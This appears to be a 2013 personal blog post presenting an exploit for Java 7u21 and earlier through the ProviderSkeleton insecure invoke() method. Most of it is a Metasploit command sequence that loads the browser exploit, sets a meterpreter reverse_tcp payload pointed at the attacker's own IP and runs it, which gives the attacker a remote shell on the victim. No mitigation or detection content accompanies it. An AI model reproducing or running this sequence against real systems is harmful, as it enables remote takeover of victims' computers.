All great things are simple, and many can be expressed in single words: freedom, justice, honor, duty, mercy, hope

Wednesday, July 3, 2013

Exploit for Java version 7u21 and earlier

Java Applet ProviderSkeleton Insecure Invoke Method:-

This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.

Exploit Targets

    0 - Generic (Java Payload) (default)
    1 - Windows x86 (Native Payload)
    2 - Mac OS X x86 (Native Payload)
    3 - Linux x86 (Native Payload)

$ msfconsole
msf > use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit(java_jre17_provider_skeleton) > show payloads
msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_provider_skeleton) > set LHOST [MY IP ADDRESS]
msf exploit(java_jre17_provider_skeleton) > exploit

No comments:

Post a Comment